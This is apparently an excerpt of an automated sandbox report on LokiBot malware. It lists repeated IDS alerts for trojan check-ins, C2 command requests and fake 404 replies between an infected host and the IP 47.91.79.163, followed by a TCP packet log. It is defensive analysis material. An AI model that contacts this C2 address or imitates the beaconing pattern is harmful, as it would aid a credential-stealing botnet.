                                    12/03/20-10:04:13.581256TCP2025483ET TROJAN LokiBot Fake 404 Response805001247.91.79.163192.168.2.3
                                    12/03/20-10:04:13.827815TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001380192.168.2.347.91.79.163
                                    12/03/20-10:04:13.827815TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001380192.168.2.347.91.79.163
                                    12/03/20-10:04:13.827815TCP2025381ET TROJAN LokiBot Checkin5001380192.168.2.347.91.79.163
                                    12/03/20-10:04:13.827815TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001380192.168.2.347.91.79.163
                                    12/03/20-10:04:13.827815TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001380192.168.2.347.91.79.163
                                    12/03/20-10:04:13.898849TCP2025483ET TROJAN LokiBot Fake 404 Response805001347.91.79.163192.168.2.3
                                    12/03/20-10:04:14.124274TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001480192.168.2.347.91.79.163
                                    12/03/20-10:04:14.124274TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001480192.168.2.347.91.79.163
                                    12/03/20-10:04:14.124274TCP2025381ET TROJAN LokiBot Checkin5001480192.168.2.347.91.79.163
                                    12/03/20-10:04:14.124274TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001480192.168.2.347.91.79.163
                                    12/03/20-10:04:14.124274TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001480192.168.2.347.91.79.163
                                    12/03/20-10:04:14.184983TCP2025483ET TROJAN LokiBot Fake 404 Response805001447.91.79.163192.168.2.3
                                    12/03/20-10:04:14.405318TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001580192.168.2.347.91.79.163
                                    12/03/20-10:04:14.405318TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001580192.168.2.347.91.79.163
                                    12/03/20-10:04:14.405318TCP2025381ET TROJAN LokiBot Checkin5001580192.168.2.347.91.79.163
                                    12/03/20-10:04:14.405318TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001580192.168.2.347.91.79.163
                                    12/03/20-10:04:14.405318TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001580192.168.2.347.91.79.163
                                    12/03/20-10:04:14.465339TCP2025483ET TROJAN LokiBot Fake 404 Response805001547.91.79.163192.168.2.3
                                    12/03/20-10:04:14.692822TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001680192.168.2.347.91.79.163
                                    12/03/20-10:04:14.692822TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001680192.168.2.347.91.79.163
                                    12/03/20-10:04:14.692822TCP2025381ET TROJAN LokiBot Checkin5001680192.168.2.347.91.79.163
                                    12/03/20-10:04:14.692822TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001680192.168.2.347.91.79.163
                                    12/03/20-10:04:14.692822TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001680192.168.2.347.91.79.163
                                    12/03/20-10:04:14.751431TCP2025483ET TROJAN LokiBot Fake 404 Response805001647.91.79.163192.168.2.3
                                    12/03/20-10:04:14.958776TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001780192.168.2.347.91.79.163
                                    12/03/20-10:04:14.958776TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001780192.168.2.347.91.79.163
                                    12/03/20-10:04:14.958776TCP2025381ET TROJAN LokiBot Checkin5001780192.168.2.347.91.79.163
                                    12/03/20-10:04:14.958776TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001780192.168.2.347.91.79.163
                                    12/03/20-10:04:14.958776TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001780192.168.2.347.91.79.163
                                    12/03/20-10:04:15.017358TCP2025483ET TROJAN LokiBot Fake 404 Response805001747.91.79.163192.168.2.3
                                    12/03/20-10:04:15.237436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001880192.168.2.347.91.79.163
                                    12/03/20-10:04:15.237436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001880192.168.2.347.91.79.163
                                    12/03/20-10:04:15.237436TCP2025381ET TROJAN LokiBot Checkin5001880192.168.2.347.91.79.163
                                    12/03/20-10:04:15.237436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001880192.168.2.347.91.79.163
                                    12/03/20-10:04:15.237436TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001880192.168.2.347.91.79.163
                                    12/03/20-10:04:15.303064TCP2025483ET TROJAN LokiBot Fake 404 Response805001847.91.79.163192.168.2.3
                                    12/03/20-10:04:15.514679TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001980192.168.2.347.91.79.163
                                    12/03/20-10:04:15.514679TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001980192.168.2.347.91.79.163
                                    12/03/20-10:04:15.514679TCP2025381ET TROJAN LokiBot Checkin5001980192.168.2.347.91.79.163
                                    12/03/20-10:04:15.514679TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001980192.168.2.347.91.79.163
                                    12/03/20-10:04:15.514679TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001980192.168.2.347.91.79.163
                                    12/03/20-10:04:15.574409TCP2025483ET TROJAN LokiBot Fake 404 Response805001947.91.79.163192.168.2.3
                                    12/03/20-10:04:15.796982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002080192.168.2.347.91.79.163
                                    12/03/20-10:04:15.796982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002080192.168.2.347.91.79.163
                                    12/03/20-10:04:15.796982TCP2025381ET TROJAN LokiBot Checkin5002080192.168.2.347.91.79.163
                                    12/03/20-10:04:15.796982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002080192.168.2.347.91.79.163
                                    12/03/20-10:04:15.796982TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002080192.168.2.347.91.79.163
                                    12/03/20-10:04:15.856978TCP2025483ET TROJAN LokiBot Fake 404 Response805002047.91.79.163192.168.2.3
                                    12/03/20-10:04:16.076667TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002180192.168.2.347.91.79.163
                                    12/03/20-10:04:16.076667TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002180192.168.2.347.91.79.163
                                    12/03/20-10:04:16.076667TCP2025381ET TROJAN LokiBot Checkin5002180192.168.2.347.91.79.163
                                    12/03/20-10:04:16.076667TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002180192.168.2.347.91.79.163
                                    12/03/20-10:04:16.076667TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002180192.168.2.347.91.79.163
                                    12/03/20-10:04:16.139505TCP2025483ET TROJAN LokiBot Fake 404 Response805002147.91.79.163192.168.2.3
                                    12/03/20-10:04:16.567527TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002280192.168.2.347.91.79.163
                                    12/03/20-10:04:16.567527TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002280192.168.2.347.91.79.163
                                    12/03/20-10:04:16.567527TCP2025381ET TROJAN LokiBot Checkin5002280192.168.2.347.91.79.163
                                    12/03/20-10:04:16.567527TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002280192.168.2.347.91.79.163
                                    12/03/20-10:04:16.567527TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002280192.168.2.347.91.79.163
                                    12/03/20-10:04:16.627368TCP2025483ET TROJAN LokiBot Fake 404 Response805002247.91.79.163192.168.2.3
                                    12/03/20-10:04:16.871689TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002380192.168.2.347.91.79.163
                                    12/03/20-10:04:16.871689TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002380192.168.2.347.91.79.163
                                    12/03/20-10:04:16.871689TCP2025381ET TROJAN LokiBot Checkin5002380192.168.2.347.91.79.163
                                    12/03/20-10:04:16.871689TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002380192.168.2.347.91.79.163
                                    12/03/20-10:04:16.871689TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002380192.168.2.347.91.79.163
                                    12/03/20-10:04:16.927499TCP2025483ET TROJAN LokiBot Fake 404 Response805002347.91.79.163192.168.2.3
                                    12/03/20-10:04:17.160447TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002480192.168.2.347.91.79.163
                                    12/03/20-10:04:17.160447TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002480192.168.2.347.91.79.163
                                    12/03/20-10:04:17.160447TCP2025381ET TROJAN LokiBot Checkin5002480192.168.2.347.91.79.163
                                    12/03/20-10:04:17.160447TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002480192.168.2.347.91.79.163
                                    12/03/20-10:04:17.160447TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002480192.168.2.347.91.79.163
                                    12/03/20-10:04:17.228399TCP2025483ET TROJAN LokiBot Fake 404 Response805002447.91.79.163192.168.2.3
                                    12/03/20-10:04:17.884116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002580192.168.2.347.91.79.163
                                    12/03/20-10:04:17.884116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002580192.168.2.347.91.79.163
                                    12/03/20-10:04:17.884116TCP2025381ET TROJAN LokiBot Checkin5002580192.168.2.347.91.79.163
                                    12/03/20-10:04:17.884116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002580192.168.2.347.91.79.163
                                    12/03/20-10:04:17.884116TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002580192.168.2.347.91.79.163
                                    12/03/20-10:04:17.950230TCP2025483ET TROJAN LokiBot Fake 404 Response805002547.91.79.163192.168.2.3
                                    12/03/20-10:04:18.181600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002680192.168.2.347.91.79.163
                                    12/03/20-10:04:18.181600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002680192.168.2.347.91.79.163
                                    12/03/20-10:04:18.181600TCP2025381ET TROJAN LokiBot Checkin5002680192.168.2.347.91.79.163
                                    12/03/20-10:04:18.181600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002680192.168.2.347.91.79.163
                                    12/03/20-10:04:18.181600TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002680192.168.2.347.91.79.163
                                    12/03/20-10:04:18.240685TCP2025483ET TROJAN LokiBot Fake 404 Response805002647.91.79.163192.168.2.3
                                    12/03/20-10:04:19.967293TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002780192.168.2.347.91.79.163
                                    12/03/20-10:04:19.967293TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002780192.168.2.347.91.79.163
                                    12/03/20-10:04:19.967293TCP2025381ET TROJAN LokiBot Checkin5002780192.168.2.347.91.79.163
                                    12/03/20-10:04:19.967293TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002780192.168.2.347.91.79.163
                                    12/03/20-10:04:19.967293TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002780192.168.2.347.91.79.163
                                    12/03/20-10:04:20.027369TCP2025483ET TROJAN LokiBot Fake 404 Response805002747.91.79.163192.168.2.3
                                    12/03/20-10:04:20.275988TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002880192.168.2.347.91.79.163
                                    12/03/20-10:04:20.275988TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002880192.168.2.347.91.79.163
                                    12/03/20-10:04:20.275988TCP2025381ET TROJAN LokiBot Checkin5002880192.168.2.347.91.79.163
                                    12/03/20-10:04:20.275988TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002880192.168.2.347.91.79.163
                                    12/03/20-10:04:20.275988TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002880192.168.2.347.91.79.163
                                    12/03/20-10:04:20.335600TCP2025483ET TROJAN LokiBot Fake 404 Response805002847.91.79.163192.168.2.3
                                    12/03/20-10:04:20.550109TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002980192.168.2.347.91.79.163
                                    12/03/20-10:04:20.550109TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002980192.168.2.347.91.79.163
                                    12/03/20-10:04:20.550109TCP2025381ET TROJAN LokiBot Checkin5002980192.168.2.347.91.79.163
                                    12/03/20-10:04:20.550109TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002980192.168.2.347.91.79.163
                                    12/03/20-10:04:20.550109TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002980192.168.2.347.91.79.163
                                    12/03/20-10:04:20.616818TCP2025483ET TROJAN LokiBot Fake 404 Response805002947.91.79.163192.168.2.3
                                    12/03/20-10:04:20.852617TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003080192.168.2.347.91.79.163
                                    12/03/20-10:04:20.852617TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003080192.168.2.347.91.79.163
                                    12/03/20-10:04:20.852617TCP2025381ET TROJAN LokiBot Checkin5003080192.168.2.347.91.79.163
                                    12/03/20-10:04:20.852617TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003080192.168.2.347.91.79.163
                                    12/03/20-10:04:20.852617TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003080192.168.2.347.91.79.163
                                    12/03/20-10:04:21.067118TCP2025483ET TROJAN LokiBot Fake 404 Response805003047.91.79.163192.168.2.3
                                    12/03/20-10:04:21.297703TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003180192.168.2.347.91.79.163
                                    12/03/20-10:04:21.297703TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003180192.168.2.347.91.79.163
                                    12/03/20-10:04:21.297703TCP2025381ET TROJAN LokiBot Checkin5003180192.168.2.347.91.79.163
                                    12/03/20-10:04:21.297703TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003180192.168.2.347.91.79.163
                                    12/03/20-10:04:21.297703TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003180192.168.2.347.91.79.163
                                    12/03/20-10:04:21.363495TCP2025483ET TROJAN LokiBot Fake 404 Response805003147.91.79.163192.168.2.3
                                    12/03/20-10:04:21.576517TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003280192.168.2.347.91.79.163
                                    12/03/20-10:04:21.576517TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003280192.168.2.347.91.79.163
                                    12/03/20-10:04:21.576517TCP2025381ET TROJAN LokiBot Checkin5003280192.168.2.347.91.79.163
                                    12/03/20-10:04:21.576517TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003280192.168.2.347.91.79.163
                                    12/03/20-10:04:21.576517TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003280192.168.2.347.91.79.163
                                    12/03/20-10:04:21.640627TCP2025483ET TROJAN LokiBot Fake 404 Response805003247.91.79.163192.168.2.3
                                    12/03/20-10:04:21.902507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003380192.168.2.347.91.79.163
                                    12/03/20-10:04:21.902507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003380192.168.2.347.91.79.163
                                    12/03/20-10:04:21.902507TCP2025381ET TROJAN LokiBot Checkin5003380192.168.2.347.91.79.163
                                    12/03/20-10:04:21.902507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003380192.168.2.347.91.79.163
                                    12/03/20-10:04:21.902507TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003380192.168.2.347.91.79.163
                                    12/03/20-10:04:21.955470TCP2025483ET TROJAN LokiBot Fake 404 Response805003347.91.79.163192.168.2.3
                                    12/03/20-10:04:22.174316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003480192.168.2.347.91.79.163
                                    12/03/20-10:04:22.174316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003480192.168.2.347.91.79.163
                                    12/03/20-10:04:22.174316TCP2025381ET TROJAN LokiBot Checkin5003480192.168.2.347.91.79.163
                                    12/03/20-10:04:22.174316TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003480192.168.2.347.91.79.163
                                    12/03/20-10:04:22.174316TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003480192.168.2.347.91.79.163
                                    12/03/20-10:04:22.233497TCP2025483ET TROJAN LokiBot Fake 404 Response805003447.91.79.163192.168.2.3
                                    12/03/20-10:04:22.442214TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003580192.168.2.347.91.79.163
                                    12/03/20-10:04:22.442214TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003580192.168.2.347.91.79.163
                                    12/03/20-10:04:22.442214TCP2025381ET TROJAN LokiBot Checkin5003580192.168.2.347.91.79.163
                                    12/03/20-10:04:22.442214TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003580192.168.2.347.91.79.163
                                    12/03/20-10:04:22.442214TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003580192.168.2.347.91.79.163
                                    12/03/20-10:04:22.546780TCP2025483ET TROJAN LokiBot Fake 404 Response805003547.91.79.163192.168.2.3
                                    12/03/20-10:04:22.769362TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003680192.168.2.347.91.79.163
                                    12/03/20-10:04:22.769362TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003680192.168.2.347.91.79.163
                                    12/03/20-10:04:22.769362TCP2025381ET TROJAN LokiBot Checkin5003680192.168.2.347.91.79.163
                                    12/03/20-10:04:22.769362TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003680192.168.2.347.91.79.163
                                    12/03/20-10:04:22.769362TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003680192.168.2.347.91.79.163
                                    12/03/20-10:04:22.829093TCP2025483ET TROJAN LokiBot Fake 404 Response805003647.91.79.163192.168.2.3
                                    12/03/20-10:04:23.028922TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003780192.168.2.347.91.79.163
                                    12/03/20-10:04:23.028922TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003780192.168.2.347.91.79.163
                                    12/03/20-10:04:23.028922TCP2025381ET TROJAN LokiBot Checkin5003780192.168.2.347.91.79.163
                                    12/03/20-10:04:23.028922TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003780192.168.2.347.91.79.163
                                    12/03/20-10:04:23.028922TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003780192.168.2.347.91.79.163
                                    12/03/20-10:04:23.092648TCP2025483ET TROJAN LokiBot Fake 404 Response805003747.91.79.163192.168.2.3
                                    12/03/20-10:04:23.302682TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003880192.168.2.347.91.79.163
                                    12/03/20-10:04:23.302682TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003880192.168.2.347.91.79.163
                                    12/03/20-10:04:23.302682TCP2025381ET TROJAN LokiBot Checkin5003880192.168.2.347.91.79.163
                                    12/03/20-10:04:23.302682TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003880192.168.2.347.91.79.163
                                    12/03/20-10:04:23.302682TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003880192.168.2.347.91.79.163
                                    12/03/20-10:04:23.366543TCP2025483ET TROJAN LokiBot Fake 404 Response805003847.91.79.163192.168.2.3
                                    12/03/20-10:04:23.590395TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003980192.168.2.347.91.79.163
                                    12/03/20-10:04:23.590395TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003980192.168.2.347.91.79.163
                                    12/03/20-10:04:23.590395TCP2025381ET TROJAN LokiBot Checkin5003980192.168.2.347.91.79.163
                                    12/03/20-10:04:23.590395TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003980192.168.2.347.91.79.163
                                    12/03/20-10:04:23.590395TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003980192.168.2.347.91.79.163
                                    12/03/20-10:04:23.648849TCP2025483ET TROJAN LokiBot Fake 404 Response805003947.91.79.163192.168.2.3
                                    12/03/20-10:04:23.869443TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004080192.168.2.347.91.79.163
                                    12/03/20-10:04:23.869443TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004080192.168.2.347.91.79.163
                                    12/03/20-10:04:23.869443TCP2025381ET TROJAN LokiBot Checkin5004080192.168.2.347.91.79.163
                                    12/03/20-10:04:23.869443TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004080192.168.2.347.91.79.163
                                    12/03/20-10:04:23.869443TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5004080192.168.2.347.91.79.163
                                    12/03/20-10:04:23.928852TCP2025483ET TROJAN LokiBot Fake 404 Response805004047.91.79.163192.168.2.3
                                    12/03/20-10:04:24.157418TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004180192.168.2.347.91.79.163
                                    12/03/20-10:04:24.157418TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004180192.168.2.347.91.79.163
                                    12/03/20-10:04:24.157418TCP2025381ET TROJAN LokiBot Checkin5004180192.168.2.347.91.79.163
                                    12/03/20-10:04:24.157418TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004180192.168.2.347.91.79.163
                                    12/03/20-10:04:24.157418TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5004180192.168.2.347.91.79.163
                                    12/03/20-10:04:24.216683TCP2025483ET TROJAN LokiBot Fake 404 Response805004147.91.79.163192.168.2.3
                                    12/03/20-10:04:24.445219TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004280192.168.2.347.91.79.163
                                    12/03/20-10:04:24.445219TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004280192.168.2.347.91.79.163
                                    12/03/20-10:04:24.445219TCP2025381ET TROJAN LokiBot Checkin5004280192.168.2.347.91.79.163
                                    12/03/20-10:04:24.445219TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004280192.168.2.347.91.79.163
                                    12/03/20-10:04:24.445219TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5004280192.168.2.347.91.79.163
                                    12/03/20-10:04:24.503657TCP2025483ET TROJAN LokiBot Fake 404 Response805004247.91.79.163192.168.2.3
                                    12/03/20-10:04:24.740638TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004380192.168.2.347.91.79.163
                                    12/03/20-10:04:24.740638TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004380192.168.2.347.91.79.163
                                    12/03/20-10:04:24.740638TCP2025381ET TROJAN LokiBot Checkin5004380192.168.2.347.91.79.163
                                    12/03/20-10:04:24.740638TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004380192.168.2.347.91.79.163
                                    12/03/20-10:04:24.740638TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5004380192.168.2.347.91.79.163
                                    12/03/20-10:04:24.798672TCP2025483ET TROJAN LokiBot Fake 404 Response805004347.91.79.163192.168.2.3
                                    12/03/20-10:04:25.359903TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004480192.168.2.347.91.79.163
                                    12/03/20-10:04:25.359903TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004480192.168.2.347.91.79.163
                                    12/03/20-10:04:25.359903TCP2025381ET TROJAN LokiBot Checkin5004480192.168.2.347.91.79.163
                                    12/03/20-10:04:25.359903TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004480192.168.2.347.91.79.163
                                    12/03/20-10:04:25.359903TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5004480192.168.2.347.91.79.163
                                    12/03/20-10:04:25.418655TCP2025483ET TROJAN LokiBot Fake 404 Response805004447.91.79.163192.168.2.3
                                    12/03/20-10:04:25.779330TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004580192.168.2.347.91.79.163
                                    12/03/20-10:04:25.779330TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004580192.168.2.347.91.79.163
                                    12/03/20-10:04:25.779330TCP2025381ET TROJAN LokiBot Checkin5004580192.168.2.347.91.79.163
                                    12/03/20-10:04:25.779330TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004580192.168.2.347.91.79.163
                                    12/03/20-10:04:25.779330TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5004580192.168.2.347.91.79.163
                                    12/03/20-10:04:25.837143TCP2025483ET TROJAN LokiBot Fake 404 Response805004547.91.79.163192.168.2.3

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 3, 2020 10:02:28.918229103 CET4970980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:28.935014963 CET804970947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:28.935132980 CET4970980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:28.939497948 CET4970980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:28.956496954 CET804970947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:28.956579924 CET4970980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:28.973191977 CET804970947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.004054070 CET804970947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.004154921 CET4970980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.004210949 CET4970980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.020729065 CET804970947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.273466110 CET4971080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.290147066 CET804971047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.290241003 CET4971080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.293359995 CET4971080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.309967995 CET804971047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.310045958 CET4971080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.326611042 CET804971047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.459626913 CET804971047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.459870100 CET4971080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.459913015 CET4971080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.476507902 CET804971047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.591481924 CET4971180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.608027935 CET804971147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.608103037 CET4971180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.611012936 CET4971180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.627451897 CET804971147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.627510071 CET4971180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.643893003 CET804971147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.858062029 CET804971147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:29.858131886 CET4971180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.858305931 CET4971180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:29.874685049 CET804971147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.131704092 CET4971280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.148288965 CET804971247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.149279118 CET4971280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.152512074 CET4971280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.169069052 CET804971247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.171303988 CET4971280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.187849045 CET804971247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.214601994 CET804971247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.216965914 CET4971280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.217003107 CET4971280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.233812094 CET804971247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.756222010 CET4971380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.772880077 CET804971347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.773467064 CET4971380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.776444912 CET4971380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.793056011 CET804971347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.795722008 CET4971380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.812310934 CET804971347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.840723038 CET804971347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:30.843281031 CET4971380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.843322992 CET4971380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:02:30.859853983 CET804971347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:02:31.098464012 CET4971480192.168.2.347.91.79.163
